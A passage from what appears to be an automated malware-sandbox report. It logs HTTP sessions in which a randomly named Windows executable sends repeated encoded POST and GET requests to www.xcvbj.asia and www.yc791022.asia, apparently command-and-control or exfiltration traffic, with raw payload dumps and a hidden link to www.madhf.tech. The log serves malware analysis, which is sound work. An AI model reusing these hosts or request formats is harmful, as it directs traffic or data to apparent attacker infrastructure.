                                                                                                              Jan 11, 2025 03:25:55.127880096 CET496INData Raw: 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 36 6e 3d 68 6a 35 6f 6c 6b 73
                                                                                                              Data Ascii: 0000"><div style='display: none;'><a href='http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4&fp=-3'>Click here to enter</a></div


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              21192.168.2.1051548149.88.81.190806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:00.890451908 CET741OUTPOST /hkgx/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              Origin: http://www.xcvbj.asia
                                                                                                              Referer: http://www.xcvbj.asia/hkgx/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 64 63 33 2f 30 72 52 6a 35 44 6c 66 44 55 4f 46 72 6e 4f 6d 4b 4d 61 45 32 38 42 2f 44 6a 43 38 47 72 51 69 57 6c 4a 74 46 70 65 56 69 6b 44 48 53 67 6d 41 6d 63 75 6a 4d 49 67 32 6b 68 4e 45 67 67 59 44 31 6a 56 63 6f 51 38 74 6b 73 37 31 63 74 6c 37 4c 69 46 69 72 44 6a 78 6e 45 39 51 45 4d 53 46 52 46 54 36 59 64 31 64 50 55 73 4d 35 46 55 6d 51 76 68 43 74 47 56 72 4a 5a 72 4e 54 6c 4b 53 6a 46 4a 4b 42 4e 54 46 66 37 39 6e 70 35 4e 6d 2b 4f 62 35 6e 44 6f 4e 64 5a 66 2b 33 56 46 43 6c 42 43 37 59 34 77 64 6f 41 54 44
                                                                                                              Data Ascii: 6n=9i9IKJ/Yinkpdc3/0rRj5DlfDUOFrnOmKMaE28B/DjC8GrQiWlJtFpeVikDHSgmAmcujMIg2khNEggYD1jVcoQ8tks71ctl7LiFirDjxnE9QEMSFRFT6Yd1dPUsM5FUmQvhCtGVrJZrNTlKSjFJKBNTFf79np5Nm+Ob5nDoNdZf+3VFClBC7Y4wdoATD


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              22192.168.2.1051549149.88.81.190806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:03.441360950 CET765OUTPOST /hkgx/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              Origin: http://www.xcvbj.asia
                                                                                                              Referer: http://www.xcvbj.asia/hkgx/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 57 38 47 50 41 69 58 67 6c 74 4c 4a 65 56 6f 45 44 43 50 77 6d 62 6d 63 6a 63 4d 4b 45 32 6b 68 5a 45 67 68 49 44 31 77 39 66 6f 41 38 76 38 63 37 7a 59 74 6c 37 4c 69 46 69 72 48 4b 57 6e 43 56 51 46 34 57 46 51 6b 54 39 52 39 31 65 5a 45 73 4d 79 6c 55 71 51 76 67 6e 74 48 59 4f 4a 63 76 4e 54 6e 43 53 69 51 39 56 4b 4e 54 66 62 37 38 54 71 6f 64 71 35 37 37 69 6e 44 45 38 43 72 37 65 35 55 34 46 30 51 6a 73 4c 50 73 54 6d 47 6d 70 72 46 65 2b 39 66 4c 6a 4a 61 56 50 79 73 56 70 32 55 50 7a 72 51 3d 3d
                                                                                                              Data Ascii: 6n=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRW8GPAiXgltLJeVoEDCPwmbmcjcMKE2khZEghID1w9foA8v8c7zYtl7LiFirHKWnCVQF4WFQkT9R91eZEsMylUqQvgntHYOJcvNTnCSiQ9VKNTfb78Tqodq577inDE8Cr7e5U4F0QjsLPsTmGmprFe+9fLjJaVPysVp2UPzrQ==


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              23192.168.2.1051550149.88.81.190806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:05.991118908 CET1778OUTPOST /hkgx/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              Origin: http://www.xcvbj.asia
                                                                                                              Referer: http://www.xcvbj.asia/hkgx/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 39 69 39 49 4b 4a 2f 59 69 6e 6b 70 63 38 6e 2f 76 49 70 6a 79 44 6b 74 64 45 4f 46 6c 48 4f 71 4b 4d 57 45 32 39 46 76 43 52 4f 38 47 34 6f 69 57 48 52 74 4b 4a 65 56 32 55 44 44 50 77 6e 4c 6d 63 37 59 4d 4b 34 49 6b 6a 68 45 68 42 55 44 69 78 39 66 69 41 38 76 31 38 37 79 63 74 6c 4c 4c 6a 31 63 72 44 57 57 6e 43 56 51 46 35 6d 46 47 46 54 39 58 39 31 64 50 55 74 44 35 46 56 39 51 76 35 61 74 48 4e 37 4a 49 62 4e 53 48 53 53 6b 69 6c 56 56 39 54 5a 63 37 38 4c 71 6f 51 30 35 37 50 41 6e 44 41 61 43 70 62 65 35 53 46 4e 75 51 2f 58 66 5a 34 74 73 52 53 7a 68 56 47 6a 34 2b 4b 77 47 4c 34 51 74 76 67 74 6a 48 61 59 33 64 53 75 42 75 4d 31 47 41 64 4b 5a 67 61 35 4a 78 78 71 63 32 59 77 65 34 62 77 50 68 61 57 55 78 76 6b 51 6e 63 54 4a 43 39 65 67 51 43 70 44 57 55 35 35 6e 44 6f 43 75 30 6c 38 49 4d 59 6b 65 30 30 68 37 45 4d 42 61 78 74 59 4e 6c 4c 4e 36 69 39 77 33 4e 37 64 52 30 38 67 48 6b 61 6a 46 6d 6f 68 4f 62 6e 59 51 49 64 62 65 46 55 46 41 31 4d 6a 68 63 52 47 57 62 52 59 71 48 [TRUNCATED]
                                                                                                              Data Ascii: 6n=9i9IKJ/Yinkpc8n/vIpjyDktdEOFlHOqKMWE29FvCRO8G4oiWHRtKJeV2UDDPwnLmc7YMK4IkjhEhBUDix9fiA8v187yctlLLj1crDWWnCVQF5mFGFT9X91dPUtD5FV9Qv5atHN7JIbNSHSSkilVV9TZc78LqoQ057PAnDAaCpbe5SFNuQ/XfZ4tsRSzhVGj4+KwGL4QtvgtjHaY3dSuBuM1GAdKZga5Jxxqc2Ywe4bwPhaWUxvkQncTJC9egQCpDWU55nDoCu0l8IMYke00h7EMBaxtYNlLN6i9w3N7dR08gHkajFmohObnYQIdbeFUFA1MjhcRGWbRYqHgxf1w/KM32LUupOLkK3OBqNqrFQqc3D9SCx6mpoxOT0ZfC6IAWhwU9Hrfbci5IS2CWVqkgZjGxhzDaTsaWgcBVocB6ctBG/NV2Q2RhXpPdOVUhixGz87qveEpMNkiZeGRV+4dfdKa65p1yYn91a31lfts6QS0FnHk/VG9Hs35YOfwFJkKcSWO7sr9qKUR3ZaaZIiCnCWec3RWw1ZD7paAKbaPD3t+hHeQMp4ia5MQ48eAph3B6YK5GgaGpH8Nw6BiuR5MEhm39DsT+2qQJh2qY0du44g2Xq6l4NPVg80xSjUBs6WNM/F8aidjEe6kO4EJZOR/W564AuPxvbhB0gcERUeJx8vmp3Hi6gIC1kKcaiRe6Nv1v60Hxt9ZVfhX21i4kRB3EteR6IM6l8nZKJcQHSOCPM0zkD/KyYaIvRIAvaE/dQIXpSFie7vGxY4NcMj1sGchbyvJhRi6Zlps/hGjaJZ7ORyVZi12c9YcRMztuTwwXCIHpuIltIxCibi+2QqB+6ZZa+oRohe6GVCcW0gnxMhwJB/pcAvz/FZu9a/if0OxjTrBjUt0981VzRoYnqw/zuf4ZY81iiEIv1pmJlH9KNYaJd4ijfhlE5L+SMOG1IQPfsfp2TcFPlSfQCprJZNecouedmqnS+bTaE7nMSwueJcDQGuD6zyi6 [TRUNCATED]


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              24192.168.2.1051551149.88.81.190806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:08.530402899 CET485OUTGET /hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.xcvbj.asia
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              25192.168.2.1051552101.35.209.183806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:35.466550112 CET750OUTPOST /31pt/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.yc791022.asia
                                                                                                              Origin: http://www.yc791022.asia
                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 32 43 35 5a 6e 4f 54 59 6b 2b 39 77 64 42 59 48 57 50 6c 51 6d 4c 37 38 37 4e 55 30 61 74 6f 31 37 62 63 38 79 50 4e 43 74 65 54 70 4c 7a 52 49 42 56 36 41 37 72 76 78 41 51 59 37 72 58 61 55 47 4d 79 53 55 39 36 39 55 6b 38 36 6b 68 59 78 55 76 63 63 6c 64 36 73 44 45 4c 4e 37 31 69 50 64 36 76 49 39 48 6f 2b 75 6e 4c 77 58 74 66 4f 4a 36 33 4e 67 58 36 34 66 47 42 75 58 6e 6a 54 75 6e 38 50 72 66 66 35 37 33 78 5a 48 42 59 53 48 73 65 66 72 49 36 32 49 67 58 4b 4b 54 53 50 68 7a 4a 73 31 55 68 56 4d 59 6a 52 75 55 7a 57
                                                                                                              Data Ascii: 6n=eOrJCvmaBO6G2C5ZnOTYk+9wdBYHWPlQmL787NU0ato17bc8yPNCteTpLzRIBV6A7rvxAQY7rXaUGMySU969Uk86khYxUvccld6sDELN71iPd6vI9Ho+unLwXtfOJ63NgX64fGBuXnjTun8Prff573xZHBYSHsefrI62IgXKKTSPhzJs1UhVMYjRuUzW
                                                                                                              Jan 11, 2025 03:26:36.338150978 CET427INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:26:36 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 263
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              26192.168.2.1051553101.35.209.183806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:38.026559114 CET774OUTPOST /31pt/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.yc791022.asia
                                                                                                              Origin: http://www.yc791022.asia
                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 63 31 2b 4f 67 38 7a 4e 6c 43 67 2b 54 70 54 44 52 4e 4d 31 36 39 37 72 7a 44 41 55 59 37 72 58 4f 55 47 4a 65 53 55 4b 75 36 55 30 38 30 72 42 59 6b 51 76 63 63 6c 64 36 73 44 46 76 6e 37 30 4b 50 64 49 37 49 38 6a 38 39 31 48 4c 78 55 74 66 4f 4e 36 33 4a 67 58 36 61 66 44 5a 49 58 69 76 54 75 6a 73 50 72 75 66 2b 78 33 78 66 59 52 5a 4e 41 4a 48 4a 6b 64 4f 47 4e 68 32 48 56 78 57 34 69 53 30 72 6b 46 41 43 66 76 2f 66 67 53 47 38 69 35 44 7a 42 37 76 53 44 34 67 33 75 4c 77 34 39 75 79 75 64 77 3d 3d
                                                                                                              Data Ascii: 6n=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafc1+Og8zNlCg+TpTDRNM1697rzDAUY7rXOUGJeSUKu6U080rBYkQvccld6sDFvn70KPdI7I8j891HLxUtfON63JgX6afDZIXivTujsPruf+x3xfYRZNAJHJkdOGNh2HVxW4iS0rkFACfv/fgSG8i5DzB7vSD4g3uLw49uyudw==
                                                                                                              Jan 11, 2025 03:26:38.905124903 CET427INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:26:38 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 263
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              27192.168.2.1051554101.35.209.183806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:40.669325113 CET1787OUTPOST /31pt/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.yc791022.asia
                                                                                                              Origin: http://www.yc791022.asia
                                                                                                              Referer: http://www.yc791022.asia/31pt/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 65 4f 72 4a 43 76 6d 61 42 4f 36 47 73 67 74 5a 6c 76 54 59 77 75 39 2f 44 52 59 48 66 76 6c 63 6d 4c 33 38 37 4d 41 6b 61 66 6b 31 2b 59 55 38 79 71 35 43 68 2b 54 70 4e 7a 52 4d 4d 31 36 73 37 72 36 4b 41 55 56 45 72 56 32 55 48 72 57 53 63 66 43 36 66 30 38 30 7a 78 59 77 55 76 63 7a 6c 64 71 77 44 46 2f 6e 37 30 4b 50 64 4a 4c 49 38 33 6f 39 33 48 4c 77 58 74 66 53 4a 36 33 78 67 58 79 77 66 44 56 2b 58 52 6e 54 75 44 38 50 34 73 33 2b 73 6e 78 64 62 52 5a 46 41 4a 43 58 6b 5a 57 73 4e 68 44 71 56 7a 32 34 30 7a 55 39 6d 30 38 6f 63 65 58 4a 67 68 2b 74 77 70 65 54 50 2f 43 71 53 34 51 57 31 6f 78 32 78 71 62 6c 43 77 79 77 4d 2f 38 65 57 6c 79 74 49 75 46 76 69 74 4b 4b 44 35 50 4f 2f 7a 7a 6c 62 57 74 62 64 49 76 74 62 59 75 43 4e 57 38 75 54 59 32 63 54 62 6f 57 6f 6c 73 73 71 79 76 36 42 58 39 6a 55 75 68 6b 4d 75 62 74 68 6f 37 4e 66 75 74 74 65 38 56 6a 77 4b 42 6b 76 6c 6f 6e 6e 77 65 2b 76 75 4c 51 34 69 42 30 65 37 4f 70 6c 33 4b 51 39 6b 37 51 33 61 69 76 63 49 55 53 54 35 50 [TRUNCATED]
                                                                                                              Data Ascii: 6n=eOrJCvmaBO6GsgtZlvTYwu9/DRYHfvlcmL387MAkafk1+YU8yq5Ch+TpNzRMM16s7r6KAUVErV2UHrWScfC6f080zxYwUvczldqwDF/n70KPdJLI83o93HLwXtfSJ63xgXywfDV+XRnTuD8P4s3+snxdbRZFAJCXkZWsNhDqVz240zU9m08oceXJgh+twpeTP/CqS4QW1ox2xqblCwywM/8eWlytIuFvitKKD5PO/zzlbWtbdIvtbYuCNW8uTY2cTboWolssqyv6BX9jUuhkMubtho7Nfutte8VjwKBkvlonnwe+vuLQ4iB0e7Opl3KQ9k7Q3aivcIUST5P8AlNAKD9QgVARGyuHvKKrIgQ6vLbONSGj6rHynUJcOCtGUhD7U+FO/lyd+kMiPeCJ8WdbBHBN/nh2vEupBXiuk4bDlFQkZzUyQexBrjBkgmWSuY74T9nsDsPkbZhjkQISRSgxqfa0RcOIgG0RGoKopeIDAtycwOYM7vOVhe6ukYYa5gyC9xP7/FHXNKVyD56gVyOZXQzmQmydADNC/5dtA4ypxajqCoz/ErowcoECT4oFAllt0PZ4R29AIE4fg0qqYs0aTF6nE3y/2hjeaYKaQaG+FRplyptf0G48thCjxdula15LVfkLhJkwmCVnFc5xKlMUSWJbv3/cPgC8tiVKbS0uhw0q3vVB6hoCvfJCqcoUUz79XWl1T+1WIQkKut3Mizojhzs/QtpjF6GmYBM7qjwIuctqqFr4XG7SfbcN6sNifwCL1xdtVlEpJ5dOIKK68nNpB1MKzs/BEF3eOKk5psh5VicQ4SAD0nY/wp+8v26QNhIAESmJN8LmaOhvVbXq3ParcRE7++ICyANrJcXbVgcjDHJGr5gndEQuTpdUpfEISUh9QzSua4MzZDgKaPJuV7jfevaES39ENKHG2aBJqkFMHBqiy5OZT4IyoK4uIMrRk3Ja0UJYZMlCz8eRRgEunatnv2Hj0iffRe1Cd7p+lodueoN1+35yY [TRUNCATED]
                                                                                                              Jan 11, 2025 03:26:41.515460968 CET427INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:26:41 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 263
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              28192.168.2.1051555101.35.209.183806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:26:43.219949007 CET488OUTGET /31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.yc791022.asia
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:26:44.089569092 CET427INHTTP/1.1 404 Not Found
                                                                                                              Date: Sat, 11 Jan 2025 02:26:43 GMT
                                                                                                              Server: Apache
                                                                                                              Content-Length: 263
                                                                                                              Connection: close
                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
